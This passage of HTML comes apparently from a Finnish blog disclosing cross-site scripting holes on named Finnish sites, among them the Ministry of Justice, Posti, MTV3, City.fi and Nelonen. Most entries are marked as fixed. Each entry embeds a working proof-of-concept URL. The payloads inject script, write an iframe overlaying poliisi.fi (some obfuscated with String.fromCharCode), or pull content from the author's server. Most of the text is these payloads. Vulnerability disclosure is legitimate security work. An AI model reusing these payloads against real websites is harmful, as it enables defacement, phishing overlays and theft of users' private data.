('/outbound/article/www.om.fi');"><b>Oikeusministeriö</b></a> (korjattu)<br />
        Haavoittuvuuden avulla Oikeusministeriön sivuille voidaan kirjoittaa mitä tahansa haittakoodia. Esimerkki lataa sivun päälle poliisi.fi-sivuston.
    </li>
<li>
        <a href="http://www.sttinfo.fi/company-database/main-info.do?companyId=%3Ciframe%20border=%220%22%20style=%22min-height:1000px;top:0;bottom:0;left:0;%20width:1224px;right:0;display:block;position:absolute;%22%20src=%22http://www.poliisi.fi%22%3E%3C/iframe%3E" onclick="javascript:urchinTracker ('/outbound/article/www.sttinfo.fi');"><b>STT</b></a><br />
        Haavoittuvuuden avulla STT:n sivuille voidaan kirjoittaa mitä tahansa haittakoodia. Esimerkki lataa STT-sivun päälle poliisi.fi-sivuston.
    </li>
<li>
        <a href="http://www.stakes.fi/FI/Custom/hakutulokset.htm?SearchString=%3Cscript%3Ealert('Sivustolta on loytynyt XSS-haavoittuvuus.');document.write('Sivustolta on loytynyt XSS-haavoittuvuus')" onclick="javascript:urchinTracker ('/outbound/article/www.stakes.fi');"><b>Stakes</b></a> (korjattu<!--3.4.-->)<br />
        Stakesin (Sosiaali- ja terveysalan tutkimus- ja kehittämiskeskus) sivuilla hakusivu antaa kirjoittaa sivulle käytännössä mitä tahansa koodia. Esimerkki kertoo haavoittuvuudesta varoitusikkunalla ja kirjoittaa sivulle JavaScriptilla tekstin XSS-haavoittuvuudesta. Tämä tapaus on siitä uskomaton, että sivusto jopa viimeistelee ja siistii kirjoittamani simppelin JavaScriptin kertomalla selaimelle että tässä hakusanassa on nyt tosiaankin <i>JavaScriptiä</i> eikä mitä tahansa &#8220;scriptiä&#8221;, kuten minä laiskasti väitän.
    </li>
<li>
        <a href="http://www.otto.fi/ottohaku.php?paikkakunta=--%3E%3Cscript%3Edocument.write(String.fromCharCode(60)%2BString.fromCharCode(105)%2BString.fromCharCode(102)%2BString.fromCharCode(114)%2BString.fromCharCode(97)%2BString.fromCharCode(109)%2BString.fromCharCode(101)%2BString.fromCharCode(32)%2BString.fromCharCode(115)%2BString.fromCharCode(114)%2BString.fromCharCode(99)%2BString.fromCharCode(61)%2BString.fromCharCode(34)%2BString.fromCharCode(104)%2BString.fromCharCode(116)%2BString.fromCharCode(116)%2BString.fromCharCode(112)%2BString.fromCharCode(58)%2BString.fromCharCode(47)%2BString.fromCharCode(47)%2BString.fromCharCode(119)%2BString.fromCharCode(119)%2BString.fromCharCode(119)%2BString.fromCharCode(46)%2BString.fromCharCode(112)%2BString.fromCharCode(111)%2BString.fromCharCode(108)%2BString.fromCharCode(105)%2BString.fromCharCode(105)%2BString.fromCharCode(115)%2BString.fromCharCode(105)%2BString.fromCharCode(46)%2BString.fromCharCode(102)%2BString.fromCharCode(105)%2BString.fromCharCode(34)%2BString.fromCharCode(115)%2BString.fromCharCode(116)%2BString.fromCharCode(121)%2BString.fromCharCode(108)%2BString.fromCharCode(101)%2BString.fromCharCode(61)%2BString.fromCharCode(34)%2BString.fromCharCode(100)%2BString.fromCharCode(105)%2BString.fromCharCode(115)%2BString.fromCharCode(112)%2BString.fromCharCode(108)%2BString.fromCharCode(97)%2BString.fromCharCode(121)%2BString.fromCharCode(58)%2BString.fromCharCode(98)%2BString.fromCharCode(108)%2BString.fromCharCode(111)%2BString.fromCharCode(99)%2BString.fromCharCode(107)%2BString.fromCharCode(59)%2BString.fromCharCode(109)%2BString.fromCharCode(105)%2BString.fromCharCode(110)%2BString.fromCharCode(45)%2BString.fromCharCode(104)%2BString.fromCharCode(101)%2BString.fromCharCode(105)%2BString.fromCharCode(103)%2BString.fromCharCode(104)%2BString.fromCharCode(116)%2BString.fromCharCode(58)%2BString.fromCharCode(49)%2BString.fromCharCode(48)%2BString.fromCharCode(48)%2BString.fromCharCode(48)%2BString.fromCharCode(112)%2BString.fromCharCode(120)%2BString.fromCharCode(59)%2BString.fromCharCode(112)%2BString.fromCharCode(111)%2BString.fromCharCode(115)%2BString.fromCharCode(105)%2BString.fromCharCode(116)%2BString.fromCharCode(105)%2BString.fromCharCode(111)%2BString.fromCharCode(110)%2BString.fromCharCode(58)%2BString.fromCharCode(97)%2BString.fromCharCode(98)%2BString.fromCharCode(115)%2BString.fromCharCode(111)%2BString.fromCharCode(108)%2BString.fromCharCode(117)%2BString.fromCharCode(116)%2BString.fromCharCode(101)%2BString.fromCharCode(59)%2BString.fromCharCode(116)%2BString.fromCharCode(111)%2BString.fromCharCode(112)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(98)%2BString.fromCharCode(111)%2BString.fromCharCode(116)%2BString.fromCharCode(116)%2BString.fromCharCode(111)%2BString.fromCharCode(109)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(108)%2BString.fromCharCode(101)%2BString.fromCharCode(102)%2BString.fromCharCode(116)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(114)%2BString.fromCharCode(105)%2BString.fromCharCode(103)%2BString.fromCharCode(104)%2BString.fromCharCode(116)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(119)%2BString.fromCharCode(105)%2BString.fromCharCode(100)%2BString.fromCharCode(116)%2BString.fromCharCode(104)%2BString.fromCharCode(58)%2BString.fromCharCode(49)%2BString.fromCharCode(50)%2BString.fromCharCode(56)%2BString.fromCharCode(48)%2BString.fromCharCode(112)%2BString.fromCharCode(120)%2BString.fromCharCode(34)%2BString.fromCharCode(62)%2BString.fromCharCode(60)%2BString.fromCharCode(47)%2BString.fromCharCode(105)%2BString.fromCharCode(102)%2BString.fromCharCode(114)%2BString.fromCharCode(97)%2BString.fromCharCode(109)%2BString.fromCharCode(101)%2BString.fromCharCode(62))%3C/script%3E%3C!--" onclick="javascript:urchinTracker ('/outbound/article/www.otto.fi');"><b>Otto (automatia)</b></a> (korjattu<!--1.4.-->)<br />
        Automatian otto-palvelussa voi hakuominaisuuden kautta kirjoittaa sivustolle mitä tahansa haittakoodia. Esimerkki lataa sivun päälle poliisi.fi-sivuston.
    </li>
<li>        <a href="http://www.digitoday.fi/page.php?page_id=67&#038;char=--%3E<br />
<h1>XSS-aukko :-)</h1>
<p>%3Ciframe%3E%3C!&#8211;&#8221;><b>Digitoday</b></a> (3/3 korjattu<!--31.3.-->)<br />
        Sivuston osoite kopioituu suoraan lähdekoodiin ja sallii minkä tahansa koodin ajamisen. Esimerkki aukaisee poliisi.fi-sivun digitodayn päälle.</p>
<p>        Aiemmat bugit on jo korjattu:<br />
        Digitoday käyttää taloussanomien kanssa yhteistä keskustelu-kantaa, joten <a href="http://www.digitoday.fi/keskustelut/iframe/article.jspa?articleID=%22%3E%3C/iframe%3E%3Ciframe%20border=%220%22%20style=%22min-height:1000px;top:0;bottom:0;left:0;%20width:1270px;right:0;display:block;position:absolute;%22%20src=%22http://www.poliisi.fi%22%3E%3C/iframe%3E" onclick="javascript:urchinTracker ('/outbound/article/www.digitoday.fi');">tämä</a> on identtinen bugi taloussanomien kanssa. Lisäksi Digitodayn keskustelualueen <a href="http://www.digitoday.fi/keskustelut/search.jspa?q=%22%3E%3C/iframe%3E%3Ciframe%20border=%220%22%20style=%22min-height:1000px;top:0;bottom:0;left:0;%20width:1270px;right:0;display:block;position:absolute;%22%20src=%22http://www.poliisi.fi%22%3E%3C/iframe%3E" onclick="javascript:urchinTracker ('/outbound/article/www.digitoday.fi');">hakukentässä on XSS-aukko</a>.
    </li>
<li>
        <a href="http://www.nebulazone.fi/saatavuus.php?city=%3Cscript%3Edocument.write(String.fromCharCode(60)%2BString.fromCharCode(105)%2BString.fromCharCode(102)%2BString.fromCharCode(114)%2BString.fromCharCode(97)%2BString.fromCharCode(109)%2BString.fromCharCode(101)%2BString.fromCharCode(32)%2BString.fromCharCode(115)%2BString.fromCharCode(114)%2BString.fromCharCode(99)%2BString.fromCharCode(61)%2BString.fromCharCode(34)%2BString.fromCharCode(104)%2BString.fromCharCode(116)%2BString.fromCharCode(116)%2BString.fromCharCode(112)%2BString.fromCharCode(58)%2BString.fromCharCode(47)%2BString.fromCharCode(47)%2BString.fromCharCode(119)%2BString.fromCharCode(119)%2BString.fromCharCode(119)%2BString.fromCharCode(46)%2BString.fromCharCode(112)%2BString.fromCharCode(111)%2BString.fromCharCode(108)%2BString.fromCharCode(105)%2BString.fromCharCode(105)%2BString.fromCharCode(115)%2BString.fromCharCode(105)%2BString.fromCharCode(46)%2BString.fromCharCode(102)%2BString.fromCharCode(105)%2BString.fromCharCode(34)%2BString.fromCharCode(115)%2BString.fromCharCode(116)%2BString.fromCharCode(121)%2BString.fromCharCode(108)%2BString.fromCharCode(101)%2BString.fromCharCode(61)%2BString.fromCharCode(34)%2BString.fromCharCode(100)%2BString.fromCharCode(105)%2BString.fromCharCode(115)%2BString.fromCharCode(112)%2BString.fromCharCode(108)%2BString.fromCharCode(97)%2BString.fromCharCode(121)%2BString.fromCharCode(58)%2BString.fromCharCode(98)%2BString.fromCharCode(108)%2BString.fromCharCode(111)%2BString.fromCharCode(99)%2BString.fromCharCode(107)%2BString.fromCharCode(59)%2BString.fromCharCode(109)%2BString.fromCharCode(105)%2BString.fromCharCode(110)%2BString.fromCharCode(45)%2BString.fromCharCode(104)%2BString.fromCharCode(101)%2BString.fromCharCode(105)%2BString.fromCharCode(103)%2BString.fromCharCode(104)%2BString.fromCharCode(116)%2BString.fromCharCode(58)%2BString.fromCharCode(49)%2BString.fromCharCode(48)%2BString.fromCharCode(48)%2BString.fromCharCode(48)%2BString.fromCharCode(112)%2BString.fromCharCode(120)%2BString.fromCharCode(59)%2BString.fromCharCode(112)%2BString.fromCharCode(111)%2BString.fromCharCode(115)%2BString.fromCharCode(105)%2BString.fromCharCode(116)%2BString.fromCharCode(105)%2BString.fromCharCode(111)%2BString.fromCharCode(110)%2BString.fromCharCode(58)%2BString.fromCharCode(97)%2BString.fromCharCode(98)%2BString.fromCharCode(115)%2BString.fromCharCode(111)%2BString.fromCharCode(108)%2BString.fromCharCode(117)%2BString.fromCharCode(116)%2BString.fromCharCode(101)%2BString.fromCharCode(59)%2BString.fromCharCode(116)%2BString.fromCharCode(111)%2BString.fromCharCode(112)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(98)%2BString.fromCharCode(111)%2BString.fromCharCode(116)%2BString.fromCharCode(116)%2BString.fromCharCode(111)%2BString.fromCharCode(109)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(108)%2BString.fromCharCode(101)%2BString.fromCharCode(102)%2BString.fromCharCode(116)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(114)%2BString.fromCharCode(105)%2BString.fromCharCode(103)%2BString.fromCharCode(104)%2BString.fromCharCode(116)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(119)%2BString.fromCharCode(105)%2BString.fromCharCode(100)%2BString.fromCharCode(116)%2BString.fromCharCode(104)%2BString.fromCharCode(58)%2BString.fromCharCode(49)%2BString.fromCharCode(53)%2BString.fromCharCode(48)%2BString.fromCharCode(48)%2BString.fromCharCode(112)%2BString.fromCharCode(120)%2BString.fromCharCode(34)%2BString.fromCharCode(62)%2BString.fromCharCode(60)%2BString.fromCharCode(47)%2BString.fromCharCode(105)%2BString.fromCharCode(102)%2BString.fromCharCode(114)%2BString.fromCharCode(97)%2BString.fromCharCode(109)%2BString.fromCharCode(101)%2BString.fromCharCode(62))%3C/script%3E%3C!--" onclick="javascript:urchinTracker ('/outbound/article/www.nebulazone.fi');"><b>Nebula</b></a> (korjattu)<br />
        Haavoittuvuuden avulla Nebulan sivuille voidaan kirjoittaa mitä tahansa haittakoodia. Esimerkki lataa poliisi.fi-sivun Nebulan päälle. Myös <a href="https://ssl.nebula.fi/laajakaistatilaus/" onclick="javascript:urchinTracker ('/outbound/article/ssl.nebula.fi');">tilauslomake</a> sisältää post-lomaketiedoilla hyödynnettävän aukon, mutta siitä en ehtinyt rakentamaan demoa. Voitte kokeilla tilausprosessissa edetessä ensimmäiseen eteentulevaan tekstikenttään kirjoittaa vaikkapa: &lt;u&gt;alleviivaus&lt;/u&gt;
    </li>
<li>
        <a href="http://www.verkkoposti.com/e3/laskuri?controller=ulkomaanpaketti&#038;consumer=true&#038;paino=%22%3E%3Ciframe%20border=%220%22%20style=%22min-height:1000px;top:0;bottom:0;left:0;%20width:1280px;right:0;display:block;position:absolute;%22%20src=%22http://www.poliisi.fi%22%3E%3C/iframe%3E%3Ciframe%3E%3C!--XSS" onclick="javascript:urchinTracker ('/outbound/article/www.verkkoposti.com');"><b>Suomen posti / Itella</b></a> (2/2 aukkoa korjattu<!--1.4.-->)<br />
        Postin pakettilaskuri salliin koodin kirjoittamisen sivupohjaan. Esimerkki lataa poliisi.fi-sivuston.</p>
<p>        Tämä aukko korjattiin 1.4.:<br />
        Postin sivuilla on todella uskomaton hakusysteemi käytössä. Sillä voi <a href="http://haku.posti.fi/highlight/index.html?url=http://www.ihminen.org/xss/xss_haavoittuvuus.php" onclick="javascript:urchinTracker ('/outbound/article/haku.posti.fi');">sisällyttää mitä tahansa</a> sivuja postin palvelimella ajettavaksi, jolloin tietysti voidaan suorittaa mitä tahansa koodia. Esimerkissä postin sivun päälle ladataan oman palvelimeni kautta poliisin sivut. Kaikki sivustot jotka käyttävät samaa hakukoneta (<a href="http://www.ultraseek.com/" onclick="javascript:urchinTracker ('/outbound/article/www.ultraseek.com');">Ultraseek</a>) ovat haavoittuvaisia. Sama haavoituvuus <a href="http://search.ultraseek.com/highlight/index.html?url=?http://www.ihminen.org/xss/xss_haavoittuvuus.php" onclick="javascript:urchinTracker ('/outbound/article/search.ultraseek.com');">löytyy</a> tietysti myös Ultraseekin omilta sivuilta.
    </li>
<li>
        <a href="http://kartta.hel.fi/opas/main/default.asp?o=11&#038;l=1&#038;n=73339&#038;e=52219&#038;d=%3Cscript%3Ealert(%22Sivustolta%20on%20loytynyt%20XSS-haavoittuvuus.%22)%3C/script%3E%EF%BB%BF%3E%3Ciframe+border%3D%220%22style%3D%22min%2Dheight%3A1000px%3Btop%3A0%3Bbottom%3A0%3Bleft%3A0%3Bwidth%3A1270px%3Bright%3A0%3Bdisplay%3Ablock%3Bposition%3Aabsolute%3B%22src%3D%22http%3A%2F%2Fwww%2Epoliisi%2Efi%22%3E%3C%2Fiframe%3E%3Ciframe%3E" onclick="javascript:urchinTracker ('/outbound/article/kartta.hel.fi');"><b>Helsingin karttapalvelu</b></a> (korjattu)<br />
        Helsingin karttapalvelu antaa kirjoittaa sivuillensa mitä tahansa haittakoodia. Esimerkki lataa sivun päälle poliisi.fi-sivun. Lisäys: toimii näköjään vain jos osoitteen kopioi osoitekenttään.
    </li>
<li>
        <a href="http://www.keskisuomalainen.com/cgi-bin/maksut/otilausece.cgi?keskisuomalainen=a&#038;130alku=a&#038;13asiakasnumero=a&#038;14nimi=a&#038;16lahiosoite=a&#038;17postinumero=a&#038;18postitoimipaikka=a&#038;19puhelinnumero=a&#038;190telefax=a&#038;191email=a&#038;33asiakasnumero=a&#038;34nimi=%3Cscript%3Edocument.write(String.fromCharCode(60)%2BString.fromCharCode(105)%2BString.fromCharCode(102)%2BString.fromCharCode(114)%2BString.fromCharCode(97)%2BString.fromCharCode(109)%2BString.fromCharCode(101)%2BString.fromCharCode(32)%2BString.fromCharCode(115)%2BString.fromCharCode(114)%2BString.fromCharCode(99)%2BString.fromCharCode(61)%2BString.fromCharCode(34)%2BString.fromCharCode(104)%2BString.fromCharCode(116)%2BString.fromCharCode(116)%2BString.fromCharCode(112)%2BString.fromCharCode(58)%2BString.fromCharCode(47)%2BString.fromCharCode(47)%2BString.fromCharCode(119)%2BString.fromCharCode(119)%2BString.fromCharCode(119)%2BString.fromCharCode(46)%2BString.fromCharCode(112)%2BString.fromCharCode(111)%2BString.fromCharCode(108)%2BString.fromCharCode(105)%2BString.fromCharCode(105)%2BString.fromCharCode(115)%2BString.fromCharCode(105)%2BString.fromCharCode(46)%2BString.fromCharCode(102)%2BString.fromCharCode(105)%2BString.fromCharCode(34)%2BString.fromCharCode(115)%2BString.fromCharCode(116)%2BString.fromCharCode(121)%2BString.fromCharCode(108)%2BString.fromCharCode(101)%2BString.fromCharCode(61)%2BString.fromCharCode(34)%2BString.fromCharCode(100)%2BString.fromCharCode(105)%2BString.fromCharCode(115)%2BString.fromCharCode(112)%2BString.fromCharCode(108)%2BString.fromCharCode(97)%2BString.fromCharCode(121)%2BString.fromCharCode(58)%2BString.fromCharCode(98)%2BString.fromCharCode(108)%2BString.fromCharCode(111)%2BString.fromCharCode(99)%2BString.fromCharCode(107)%2BString.fromCharCode(59)%2BString.fromCharCode(109)%2BString.fromCharCode(105)%2BString.fromCharCode(110)%2BString.fromCharCode(45)%2BString.fromCharCode(104)%2BString.fromCharCode(101)%2BString.fromCharCode(105)%2BString.fromCharCode(103)%2BString.fromCharCode(104)%2BString.fromCharCode(116)%2BString.fromCharCode(58)%2BString.fromCharCode(49)%2BString.fromCharCode(48)%2BString.fromCharCode(48)%2BString.fromCharCode(48)%2BString.fromCharCode(112)%2BString.fromCharCode(120)%2BString.fromCharCode(59)%2BString.fromCharCode(112)%2BString.fromCharCode(111)%2BString.fromCharCode(115)%2BString.fromCharCode(105)%2BString.fromCharCode(116)%2BString.fromCharCode(105)%2BString.fromCharCode(111)%2BString.fromCharCode(110)%2BString.fromCharCode(58)%2BString.fromCharCode(97)%2BString.fromCharCode(98)%2BString.fromCharCode(115)%2BString.fromCharCode(111)%2BString.fromCharCode(108)%2BString.fromCharCode(117)%2BString.fromCharCode(116)%2BString.fromCharCode(101)%2BString.fromCharCode(59)%2BString.fromCharCode(116)%2BString.fromCharCode(111)%2BString.fromCharCode(112)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(98)%2BString.fromCharCode(111)%2BString.fromCharCode(116)%2BString.fromCharCode(116)%2BString.fromCharCode(111)%2BString.fromCharCode(109)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(108)%2BString.fromCharCode(101)%2BString.fromCharCode(102)%2BString.fromCharCode(116)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(114)%2BString.fromCharCode(105)%2BString.fromCharCode(103)%2BString.fromCharCode(104)%2BString.fromCharCode(116)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(119)%2BString.fromCharCode(105)%2BString.fromCharCode(100)%2BString.fromCharCode(116)%2BString.fromCharCode(104)%2BString.fromCharCode(58)%2BString.fromCharCode(49)%2BString.fromCharCode(50)%2BString.fromCharCode(56)%2BString.fromCharCode(48)%2BString.fromCharCode(112)%2BString.fromCharCode(120)%2BString.fromCharCode(34)%2BString.fromCharCode(62)%2BString.fromCharCode(60)%2BString.fromCharCode(47)%2BString.fromCharCode(105)%2BString.fromCharCode(102)%2BString.fromCharCode(114)%2BString.fromCharCode(97)%2BString.fromCharCode(109)%2BString.fromCharCode(101)%2BString.fromCharCode(62))%3C/script%3E%3C!--&#038;36lahiosoite=a&#038;37postinumero=a&#038;38postitoimipaikka=a&#038;39puhelinnumero=a&#038;390telefax=a&#038;maksutapa=Osuuspankki" onclick="javascript:urchinTracker ('/outbound/article/www.keskisuomalainen.com');"><b>Keskisuomalainen</b></a> (korjattu<!--31.3.-->)<br />
        Haavoittuvuus lehdentilausprosessissa, siinä vaiheessa kun siirrytään maksamaan tilausta, mahdollistaa minkä tahansa koodin kirjoittamisen keskisuomalainen.com-sivustolla. Esimerkki lataa poliisi.fi-sivun.
    </li>
<li>
        <a href="http://viihde.mtv3.fi/videot/index.shtml/test');alert('Talla sivustolla on auki XSS-haavoittuvuus. Esimerkki lataa poliisi.fi-sivun tahan paalle.');document.write(String.fromCharCode(60)%2BString.fromCharCode(105)%2BString.fromCharCode(102)%2BString.fromCharCode(114)%2BString.fromCharCode(97)%2BString.fromCharCode(109)%2BString.fromCharCode(101)%2BString.fromCharCode(32)%2BString.fromCharCode(115)%2BString.fromCharCode(114)%2BString.fromCharCode(99)%2BString.fromCharCode(61)%2BString.fromCharCode(34)%2BString.fromCharCode(104)%2BString.fromCharCode(116)%2BString.fromCharCode(116)%2BString.fromCharCode(112)%2BString.fromCharCode(58)%2BString.fromCharCode(47)%2BString.fromCharCode(47)%2BString.fromCharCode(119)%2BString.fromCharCode(119)%2BString.fromCharCode(119)%2BString.fromCharCode(46)%2BString.fromCharCode(112)%2BString.fromCharCode(111)%2BString.fromCharCode(108)%2BString.fromCharCode(105)%2BString.fromCharCode(105)%2BString.fromCharCode(115)%2BString.fromCharCode(105)%2BString.fromCharCode(46)%2BString.fromCharCode(102)%2BString.fromCharCode(105)%2BString.fromCharCode(34)%2BString.fromCharCode(115)%2BString.fromCharCode(116)%2BString.fromCharCode(121)%2BString.fromCharCode(108)%2BString.fromCharCode(101)%2BString.fromCharCode(61)%2BString.fromCharCode(34)%2BString.fromCharCode(100)%2BString.fromCharCode(105)%2BString.fromCharCode(115)%2BString.fromCharCode(112)%2BString.fromCharCode(108)%2BString.fromCharCode(97)%2BString.fromCharCode(121)%2BString.fromCharCode(58)%2BString.fromCharCode(98)%2BString.fromCharCode(108)%2BString.fromCharCode(111)%2BString.fromCharCode(99)%2BString.fromCharCode(107)%2BString.fromCharCode(59)%2BString.fromCharCode(109)%2BString.fromCharCode(105)%2BString.fromCharCode(110)%2BString.fromCharCode(45)%2BString.fromCharCode(104)%2BString.fromCharCode(101)%2BString.fromCharCode(105)%2BString.fromCharCode(103)%2BString.fromCharCode(104)%2BString.fromCharCode(116)%2BString.fromCharCode(58)%2BString.fromCharCode(49)%2BString.fromCharCode(48)%2BString.fromCharCode(48)%2BString.fromCharCode(48)%2BString.fromCharCode(112)%2BString.fromCharCode(120)%2BString.fromCharCode(59)%2BString.fromCharCode(112)%2BString.fromCharCode(111)%2BString.fromCharCode(115)%2BString.fromCharCode(105)%2BString.fromCharCode(116)%2BString.fromCharCode(105)%2BString.fromCharCode(111)%2BString.fromCharCode(110)%2BString.fromCharCode(58)%2BString.fromCharCode(97)%2BString.fromCharCode(98)%2BString.fromCharCode(115)%2BString.fromCharCode(111)%2BString.fromCharCode(108)%2BString.fromCharCode(117)%2BString.fromCharCode(116)%2BString.fromCharCode(101)%2BString.fromCharCode(59)%2BString.fromCharCode(116)%2BString.fromCharCode(111)%2BString.fromCharCode(112)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(98)%2BString.fromCharCode(111)%2BString.fromCharCode(116)%2BString.fromCharCode(116)%2BString.fromCharCode(111)%2BString.fromCharCode(109)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(108)%2BString.fromCharCode(101)%2BString.fromCharCode(102)%2BString.fromCharCode(116)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(114)%2BString.fromCharCode(105)%2BString.fromCharCode(103)%2BString.fromCharCode(104)%2BString.fromCharCode(116)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(119)%2BString.fromCharCode(105)%2BString.fromCharCode(100)%2BString.fromCharCode(116)%2BString.fromCharCode(104)%2BString.fromCharCode(58)%2BString.fromCharCode(49)%2BString.fromCharCode(50)%2BString.fromCharCode(56)%2BString.fromCharCode(48)%2BString.fromCharCode(112)%2BString.fromCharCode(120)%2BString.fromCharCode(34)%2BString.fromCharCode(62)%2BString.fromCharCode(60)%2BString.fromCharCode(47)%2BString.fromCharCode(105)%2BString.fromCharCode(102)%2BString.fromCharCode(114)%2BString.fromCharCode(97)%2BString.fromCharCode(109)%2BString.fromCharCode(101)%2BString.fromCharCode(62));%20var%20xss_aukko=('loytyi" onclick="javascript:urchinTracker ('/outbound/article/viihde.mtv3.fi');"><b>Maikkari</b></a> (korjattu)<br />
        MTV3-kanavan sivustolla on videopalvelussa aukko, joka sallii javascript-komentojen suorittamisen sivustolla. Esimerkki lataa poliisi.fi-sivuston maikkarin sivun päälle (varoituksen kera).
    </li>
<li>
        <a href="http://www.city.fi/deitti/haku/?question_1%5Bfrom%5D=%22%20class=%22fancy%22%20/%3E%3Ciframe+border%3D%220%22style%3D%22min%2Dheight%3A1000px%3Btop%3A0%3Bbottom%3A0%3Bleft%3A0%3Bwidth%3A1024px%3Bright%3A0%3Bdisplay%3Ablock%3Bposition%3Aabsolute%3B%22src%3D%22http%3A%2F%2Fwww%2Epoliisi%2Efi%22%3E%3C%2Fiframe%3E%3C!--" onclick="javascript:urchinTracker ('/outbound/article/www.city.fi');"><b>City.fi / Deitti.net</b></a> (5/5 aukkoa korjattu<!--1.4.-->, kts. <a href="#citypost">post</a>-kohta) <small>(Tämän ensimmäisen löysi Margus Sipria. )</small><br />
        Deitti.net / City.fi -palveluiden lomake antaa kirjoittaa sivustolla tarkistamatta mitä tahansa koodia. <a href="http://www.city.fi/kerrokaverille/?url=%22%3E%3Ciframe+border%3D%220%22style%3D%22min%2Dheight%3A1000px%3Btop%3A0%3Bbottom%3A0%3Bleft%3A0%3Bwidth%3A1024px%3Bright%3A0%3Bdisplay%3Ablock%3Bposition%3Aabsolute%3B%22src%3D%22http%3A%2F%2Fwww%2Epoliisi%2Efi%22%3E%3C%2Fiframe%3E%3C!--" onclick="javascript:urchinTracker ('/outbound/article/www.city.fi');">Toinen aukko</a> sijaitsee kerro kaverille -ominaisuudessa. Esimerkit lataavat poliisi.fi-sivun city.fi:n päälle. Tällä olisi mahdollista saada ihmisistä hyvinkin yksityisiä ja arkoja tietoja urkittua.
    </li>
<li>
        <a href="http://nelonen.fi/uutisvideot/default.asp?video=%22%3E%3C/iframe%3E%3Cscript%3Ealert('Talta%20sivustolta%20on%20loytynyt%20XSS-haavoittuvuus.');%3C/script%3E%3C/script%3E%3Ciframe%20src=%22http://www.ihminen.org/xss/xss_haavoittuvuus.php?title" onclick="javascript:urchinTracker ('/outbound/article/nelonen.fi');"><b>Nelonen.fi</b></a> (korjattu<!--31.3.-->)<br />
        Haavoittuvuuden avulla voidaan ladata mitä tahansa sisältöä Nelonen.fi-sivuston sisälle. Esimerkissä lataan ulkoisen HTML-tiedoston (punainen teksti) sivustolle. Tässä esimerkki <a href="http://www.nelonen.fi/uutisvideot/default.asp?video=%22%3E%3C/iframe%3E%3Cscript%3Ealert('Talta%20sivustolta%20on%20loytynyt%20XSS-haavoittuvuus.');%3C/script%3E%3Cspan%20style=%22display:block;position:absolute;width:1500px;height:1500px;padding:100px;bottom:0;top:0;background:red;color:white;overflow:%20hidden;%22%3EXSS-haavoittuvuus%3C/span%3E%3Ciframe%20src=%22" onclick="javascript:urchinTracker ('/outbound/article/www.nelonen.fi');">punaisesta nelosesta</a>.
    </li>
<li>
        <a href="http://www.jimtv.fi/video2.asp?url=%22);%3C/script%3E%3Ciframe+border%3D%220%22style%3D%22min%2Dheight%3A1000px%3Btop%3A0%3Bbottom%3A0%3Bleft%3A0%3Bwidth%3A1024px%3Bright%3A0%3Bdisplay%3Ablock%3Bposition%3Aabsolute%3B%22src%3D%22http%3A%2F%2Fwww%2Epoliisi%2Efi%22%3E%3C%2Fiframe%3E" onclick="javascript:urchinTracker ('/outbound/article/www.jimtv.fi');"><b>JimTV</b></a> (korjattu<!--31.3.-->)<br />
        Jim-televisiokanavan sivustolla on videopalvelussa aukko, joka sallii minkä tahansa koodin kirjoittamisen sivustolle. Esimerkki lataa sivun päälle poliisi.fi-sivuston.
    </li>
<li>
        <a href="http://plaza.fi/mobiili/soittoaanet/funtonet/?jarjestys=&#038;qm=%22%3E%3Ciframe%20border=%220%22%20style=%22min-height:1000px;top:0;bottom:0;left:0;%20width:1024px;right:0;display:block;position:absolute;%22%20src=%22http://www.poliisi.fi%22%3E%3C/iframe%3E" onclick="javascript:urchinTracker ('/outbound/article/plaza.fi');"><b>Plaza</b></a> (korjattu<!--31.3.-->)<br />
        Plazan sivuille voi mobiili-sivun hakutoiminnon kautta syöttää mitä tahansa haittakoodia. Esimerkki lataa sivun päälle (hieman kömpelösti tosin) poliisi.fi-sivuston.
    </li>
<li>
        <a href="http://fin.afterdawn.com/haku/hakutulokset.cfm?q=%22%3E%3Ciframe+border%3D%220%22style%3D%22min%2Dheight%3A1000px%3Btop%3A0%3Bbottom%3A0%3Bleft%3A0%3Bwidth%3A1024px%3Bright%3A0%3Bdisplay%3Ablock%3Bposition%3Aabsolute%3B%22src%3D%22http%3A%2F%2Fwww%2Epoliisi%2Efi%22%3E%3C%2Fiframe%3E%3C!--" onclick="javascript:urchinTracker ('/outbound/article/fin.afterdawn.com');"><b>Afterdawn</b></a> (korjattu<!--1.4.-->)<br />
        Afterdawn, digi-viihdetekniikkaan keskittynyt uutissivusto antaa hakukentässään kirjoittaa sivustolle mitä tahansa koodia. Esimerkki lataa poliisi.fi:n sivun päälle.
    </li>
<li>
        <a href="http://www.taloussanomat.fi/keskustelut/iframe/article.jspa?articleID=%22%3E%3C/iframe%3E%3Ciframe%20border=%220%22%20style=%22min-height:1000px;top:0;bottom:0;left:0;%20width:1270px;right:0;display:block;position:absolute;%22%20src=%22http://www.poliisi.fi%22%3E%3C/iframe%3E" onclick="javascript:urchinTracker ('/outbound/article/www.taloussanomat.fi');"><b>Taloussanomat</b></a> (korjattu<!--31.3.-->)<br />
